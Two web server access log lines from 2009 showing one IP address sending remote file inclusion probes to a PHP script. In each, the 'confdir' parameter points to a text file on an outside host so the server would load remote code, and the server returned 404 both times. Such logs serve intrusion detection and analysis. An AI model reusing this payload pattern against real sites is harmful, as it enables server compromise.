64.150.183.219 - - [18/Oct/2009:05:27:52 -0400] "GET /logs/access_log.Q109062900/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:27:56 -0400] "GET /logs/access_log.Q109062800/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
